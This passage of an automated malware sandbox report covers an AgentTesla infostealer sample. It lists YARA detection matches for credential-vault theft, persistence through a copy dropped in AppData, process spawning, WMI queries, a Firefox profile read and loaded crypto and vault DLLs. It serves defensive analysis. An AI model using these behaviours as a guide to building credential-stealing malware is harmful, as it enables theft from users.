                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0297EA082_2_0297EA08
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_02974A682_2_02974A68
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_02973E502_2_02973E50
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0297AF372_2_0297AF37
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0297ADA02_2_0297ADA0
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0685C76C2_2_0685C76C
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068539B42_2_068539B4
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068562D72_2_068562D7
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068555E32_2_068555E3
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068555E82_2_068555E8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_06867E902_2_06867E90
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068656A82_2_068656A8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068667002_2_06866700
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068627582_2_06862758
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_06865E082_2_06865E08
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068677B02_2_068677B0
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0686E4C82_2_0686E4C8
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_068600402_2_06860040
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeCode function: 2_2_0686003E2_2_0686003E
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_018D3E343_2_018D3E34
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_018DE04C3_2_018DE04C
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_018D703B3_2_018D703B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_077BE7E03_2_077BE7E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_077B21063_2_077B2106
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_077B6CE83_2_077B6CE8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_077B2C383_2_077B2C38
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_077B8C003_2_077B8C00
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_077B6CD83_2_077B6CD8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07C01BC03_2_07C01BC0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_00E141986_2_00E14198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_00E1E8D86_2_00E1E8D8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_00E14A686_2_00E14A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_00E13E506_2_00E13E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_06567E986_2_06567E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_065656B06_2_065656B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_065667086_2_06566708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_065635806_2_06563580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_065600406_2_06560040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_065677B86_2_065677B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_0656E4D06_2_0656E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_06565DFF6_2_06565DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 6_2_065600066_2_06560006
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_00EF3E3410_2_00EF3E34
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_00EFE04C10_2_00EFE04C
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_00EF703B10_2_00EF703B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BC21B010_2_06BC21B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BCAEF810_2_06BCAEF8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BCB6B810_2_06BCB6B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BC728910_2_06BC7289
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BC721010_2_06BC7210
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06BC23F010_2_06BC23F0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9233810_2_06E92338
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9106910_2_06E91069
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9C68010_2_06E9C680
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9560210_2_06E95602
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9561010_2_06E95610
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E945F010_2_06E945F0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9C24810_2_06E9C248
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9C23810_2_06E9C238
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9E1E910_2_06E9E1E9
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9E1F810_2_06E9E1F8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9BE1010_2_06E9BE10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E958A810_2_06E958A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9589710_2_06E95897
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_06E9D92010_2_06E9D920
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_073D1A7010_2_073D1A70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_073D2D7810_2_073D2D78
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_0745E7E010_2_0745E7E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_0745210610_2_07452106
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_07456CE810_2_07456CE8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_07458C0010_2_07458C00
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 10_2_07456CD810_2_07456CD8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DCA4B011_2_00DCA4B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DCE8A011_2_00DCE8A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DC4A6811_2_00DC4A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DCAC8011_2_00DCAC80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DC3E5011_2_00DC3E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_00DC419811_2_00DC4198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_063EC3FC11_2_063EC3FC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_063E52A811_2_063E52A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_063E52A211_2_063E52A2
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_063E180011_2_063E1800
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_06407E9811_2_06407E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_064056B011_2_064056B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_0640670811_2_06406708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_0640358011_2_06403580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_0640004011_2_06400040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_06405E1011_2_06405E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_064077B811_2_064077B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_0640E4D011_2_0640E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 11_2_0640001E11_2_0640001E
                    Source: rMT103_126021720924.exe, 00000000.00000002.1718234612.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exe, 00000000.00000002.1717340738.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exe, 00000000.00000000.1693462718.0000000000958000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKUIL.exe6 vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exe, 00000000.00000002.1722415938.0000000007F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exe, 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exe, 00000000.00000002.1718690777.000000000451A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exe, 00000002.00000002.4167842133.0000000000CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exeBinary or memory string: OriginalFilenameKUIL.exe6 vs rMT103_126021720924.exe
                    Source: rMT103_126021720924.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: rMT103_126021720924.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sgxIb.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.rMT103_126021720924.exe.7f40000.6.raw.unpack, zPwlw449bqb1U0EqqG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.rMT103_126021720924.exe.7f40000.6.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.rMT103_126021720924.exe.7f40000.6.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rMT103_126021720924.exe.7f40000.6.raw.unpack, uHcF5TZCInwSNV5WnO.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, zPwlw449bqb1U0EqqG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, zPwlw449bqb1U0EqqG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/4@4/2
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rMT103_126021720924.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: rMT103_126021720924.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: rMT103_126021720924.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: rMT103_126021720924.exe, 00000000.00000000.1693462718.0000000000892000.00000002.00000001.01000000.00000003.sdmp, sgxIb.exe.2.drBinary or memory string: INSERT INTO Service (CustomerId, Active, Date) VALUES (@customerId, '1', @date);
                    Source: rMT103_126021720924.exe, 00000000.00000000.1693462718.0000000000892000.00000002.00000001.01000000.00000003.sdmp, sgxIb.exe.2.drBinary or memory string: SELECT COUNT(*) FROM Service WHERE (Active LIKE '1') AND (CustomerId = @id);
                    Source: rMT103_126021720924.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeFile read: C:\Users\user\Desktop\rMT103_126021720924.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\rMT103_126021720924.exe "C:\Users\user\Desktop\rMT103_126021720924.exe"
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeProcess created: C:\Users\user\Desktop\rMT103_126021720924.exe "C:\Users\user\Desktop\rMT103_126021720924.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeProcess created: C:\Users\user\Desktop\rMT103_126021720924.exe "C:\Users\user\Desktop\rMT103_126021720924.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dllJump to behavior
